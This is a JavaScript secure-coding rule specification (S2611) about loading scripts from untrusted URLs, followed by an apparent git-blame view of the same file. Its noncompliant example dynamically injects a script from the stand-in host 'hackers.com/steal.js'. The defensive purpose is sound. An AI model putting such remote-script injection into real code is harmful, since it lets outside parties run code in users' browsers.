rspec/rules/S2611/javascript/rule.adoc

== Why is this an issue?

Including content in your site from an untrusted source can expose your users to attackers and even compromise your own site. For that reason, this rule raises an issue for each non-relative URL.


=== Noncompliant code example

[source,javascript]
----
function include(url) {
  var s = document.createElement("script");
  s.setAttribute("type", "text/javascript");
  s.setAttribute("src", url);
  document.body.appendChild(s);
}
include("http://hackers.com/steal.js")  // Noncompliant
----

== Resources

* https://owasp.org/www-project-top-ten/2017/A1_2017-Injection[OWASP Top 10 2017 Category A1] - Injection
* https://cwe.mitre.org/data/definitions/829[MITRE, CWE-829] - Inclusion of Functionality from Untrusted Control Sphere


ifdef::env-github,rspecator-view[]

'''
== Implementation Specification
(visible only on this page)

=== Message

Remove this content from an untrusted source.


=== Parameters

.domainsToIgnore
****

Comma-delimited list of domains to ignore. Regexes may be used, E.G. (.*\.)?example\.com,foo\.org
****


'''
== Comments And Links
(visible only on this page)

=== deprecates: S1829

=== on 10 Jan 2020, 10:14:47 Eric Therond wrote:
Should be deprecated:

* No compliant solution to propose
* Could be noisy <img src="http://example.com/pic.gif"> or <script src=\http://example.com/jquery.js> is pretty common
* Could be replaced by a more relevant taint analysis rule in the future

endif::env-github,rspecator-view[]
migrate rule descriptions to new education format 2023-05-03 11:06:20 +02:00			`== Why is this an issue?`

Fix the missing default metadata fields 2021-04-28 18:08:03 +02:00			`Including content in your site from an untrusted source can expose your users to attackers and even compromise your own site. For that reason, this rule raises an issue for each non-relative URL.`

Add rules 2000-2999 2020-06-30 12:48:07 +02:00
migrate rule descriptions to new education format 2023-05-03 11:06:20 +02:00			`=== Noncompliant code example`
Add rules 2000-2999 2020-06-30 12:48:07 +02:00
RULEAPI-661: Add syntax coloring 2022-02-04 17:28:24 +01:00			`[source,javascript]`
Add rules 2000-2999 2020-06-30 12:48:07 +02:00			`----`
			`function include(url) {`
			`var s = document.createElement("script");`
			`s.setAttribute("type", "text/javascript");`
			`s.setAttribute("src", url);`
			`document.body.appendChild(s);`
			`}`
			`include("http://hackers.com/steal.js") // Noncompliant`
			`----`
Fix the missing default metadata fields 2021-04-28 18:08:03 +02:00
migrate rule descriptions to new education format 2023-05-03 11:06:20 +02:00			`== Resources`
Fix the missing default metadata fields 2021-04-28 18:08:03 +02:00
Modify: Fix old/broken embedded links (#1100) 2022-07-08 13:58:56 +02:00			`* https://owasp.org/www-project-top-ten/2017/A1_2017-Injection[OWASP Top 10 2017 Category A1] - Injection`
RULEAPI-755 Update CWE URLs by removing .html suffix and update with https protocol (#926) * Change affects only see.adoc and rule.adoc files, not comments-and-links.adoc files 2022-04-07 08:53:59 -05:00			`* https://cwe.mitre.org/data/definitions/829[MITRE, CWE-829] - Inclusion of Functionality from Untrusted Control Sphere`
Fix the missing default metadata fields 2021-04-28 18:08:03 +02:00
Export comments and rspec-to-rspec links from jira 2021-06-02 20:44:38 +02:00
Fix the comment display: rule-id, timestamp, GH visibility, link direction 2021-06-03 09:05:38 +02:00			`ifdef::env-github,rspecator-view[]`
RULEAPI-666: Migrate the "List of parameters", "Highlighting" and "Message" fields from jira RSPEC (#346) 2021-09-20 15:38:42 +02:00
			`'''`
			`== Implementation Specification`
			`(visible only on this page)`

Inline adoc when include has no additional value (#1940) Inline adoc files when they are included exactly once. Also fix language tags because this inlining gives us better information on what language the code is written in. 2023-05-25 14:18:12 +02:00			`=== Message`

			`Remove this content from an untrusted source.`


			`=== Parameters`

			`.domainsToIgnore`
			`****`

			`Comma-delimited list of domains to ignore. Regexes may be used, E.G. (.*\.)?example\.com,foo\.org`
			`****`
RULEAPI-666: Migrate the "List of parameters", "Highlighting" and "Message" fields from jira RSPEC (#346) 2021-09-20 15:38:42 +02:00

RULEAPI-576: add a horizontal rule between rule description and comments 2021-06-08 15:52:13 +02:00			`'''`
Export comments and rspec-to-rspec links from jira 2021-06-02 20:44:38 +02:00			`== Comments And Links`
			`(visible only on this page)`

Inline adoc when include has no additional value (#1940) Inline adoc files when they are included exactly once. Also fix language tags because this inlining gives us better information on what language the code is written in. 2023-05-25 14:18:12 +02:00			`=== deprecates: S1829`

			`=== on 10 Jan 2020, 10:14:47 Eric Therond wrote:`
			`Should be deprecated:`

			`* No compliant solution to propose`
			`* Could be noisy <img src="http://example.com/pic.gif"> or <script src=\http://example.com/jquery.js> is pretty common`
			`* Could be replaced by a more relevant taint analysis rule in the future`

Fix the comment display: rule-id, timestamp, GH visibility, link direction 2021-06-03 09:05:38 +02:00			`endif::env-github,rspecator-view[]`